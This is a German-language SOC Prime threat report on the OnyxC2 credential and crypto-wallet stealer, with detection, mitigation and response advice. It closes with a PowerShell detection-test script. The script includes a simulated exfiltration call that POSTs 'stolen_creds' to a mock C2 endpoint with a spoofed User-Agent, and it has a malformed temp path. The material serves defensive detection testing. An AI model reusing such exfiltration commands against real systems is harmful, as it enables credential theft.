SOC Prime Bias: Hoch

16 Jun 2026 12:54 UTC

OnyxC2: Ein neuer Stealer, der 210 Anwendungen angreift

Author Photo
SOC Prime Team linkedin icon Folgen
OnyxC2: Ein neuer Stealer, der 210 Anwendungen angreift
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

OnyxC2 ist ein aufstrebender Malware-as-a-Service Stealer, der entwickelt wurde, um Zugangsdaten, Zwei-Faktor-Authentifizierungserweiterungen und Kryptowährungs-Wallets in etwa 210 Anwendungen zu stehlen. Die Plattform bietet ein vollwertiges kommerzielles Toolkit, einschließlich eines Management-Panels, Builders und Remote-Zugriffsfunktionalität. Sie verlässt sich außerdem auf fortschrittliche Ausweichmethoden, darunter DLL-Sideloading mit übergroßen signierten Binaries und verschlüsselten Payload-Komponenten.

Untersuchung

BlackFog-Forscher untersuchten mehrere OnyxC2-Proben und entdeckten eine DLL-Sideloading-Methode, die ein signiertes Host-Executable zusammen mit einer bösartigen 120 MB+ DLL missbraucht, die als NVIDIA-Grafikbibliothek getarnt ist. Netzwerkanalysen zeigten, dass die Malware über HTTPS mit einem bestimmten Backend-API-Endpunkt kommuniziert. Die Forscher fanden auch verschlüsselte Overlays, die in die DLL eingebettet sind, was der Malware hilft, einer unkomplizierten statischen Analyse zu entgehen.

Minderung

Das Einsetzen von Anti-Daten-Exfiltrationskontrollen am Endpunkt kann helfen, unautorisierte ausgehende Datenübertragungen unabhängig vom verwendeten Prozess zu blockieren. Sicherheitsteams sollten auf verdächtige DLL-Ladungen achten, die mit signierten Binaries in Verbindung stehen, und ungewöhnlich große Dateien in benutzerbeschreibbaren Pfaden untersuchen. Starke Anwendungskontrollrichtlinien und die Überwachung unautorisierter geplante Aufgaben werden ebenfalls empfohlen.

Reaktion

Wenn OnyxC2-Aktivitäten entdeckt werden, isolieren Sie das betroffene System sofort, um weiteren Datendiebstahl zu stoppen. Erfassen Sie einen vollständigen Speicherdump, um die entschlüsselte Nutzlast wiederherzustellen, und prüfen Sie auf aktive HVNC-Sitzungen oder SOCKS5-Proxytätigkeit. Überprüfen Sie alle kürzlich erstellten geplanten Aufgaben und untersuchen Sie die Anmeldedaten speichernde Anwendungen auf Anzeichen einer Kompromittierung.

Angriffsflusssicherung

Ausführung der Simulation

Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Adversary-Technik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffs Szenario & Befehle: Der Angreifer versucht, gestohlene Browser-Anmeldedaten zu exfiltrieren. Um der Erkennung durch Netzwerk-Sicherheitsüberwachung zu entgehen, setzt er ein tragbares Tor-Binary ein, um einen anonymisierten Tunnel zu erstellen. Sobald der Tunnel aufgebaut ist, initiiert die Malware eine Verbindung zu ihrem Befehls- und Kontrollserver (C2). Um sich in legitimen Webverkehr einzufügen, fälscht die Malware ihre User-Agent-Informationen, um wie ein „Cloudflare“-Zugangspunkt auszusehen, und zielt auf einen speziellen API-Endpunkt, der hinter einem Cloudflare-Proxy gehostet wird. Diese Sequenz ist darauf ausgelegt, die Korrelation des Erkennungsregelwerks tor von Befehlszeilenparametern und dem speziellen /backend/api/app.php URL-Muster auszulösen.

  • Regressionstestskript:

    # Simulation der OnyxC2-Stealer-Kommunikation
    
    # 1. Simulation der Anwesenheit von Tor (Erstellen eines Dummy-Datei/Prozessverhaltens)
    # In einem realen Szenario wäre dies das tatsächliche tor.exe
    $TorPath = "$env:TEMPtor.exe"
    "Simulierter Tor-Binary-Inhalt" | Out-File -FilePath $TorPath
    
    # Erstellen eines Prozessausführungsereignisses für 'tor' über die Befehlszeile
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden
    
    # Um sicherzustellen, dass die Erkennungslogik 'command_line|contains: tor' trifft, 
    # führen wir einen Befehl aus, der den String 'tor' enthält
    cmd.exe /c "echo initializing tor proxy..."
    
    # 2. Simulation der C2-Netzwerkverbindung
    # Wir verwenden PowerShell, um eine Netzwerkverbindung mit der speziellen URL und dem User-Agent zu simulieren
    $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php"
    $UserAgent = "Cloudflare-Proxy-Agent/1.0"
    
    Write-Host "Versuche C2-Kommunikation zu $C2Url"
    Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue
  • Säuberungsbefehle:

    # Entfernen simulierte Artefakte
    Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "Simulation Cleanup complete."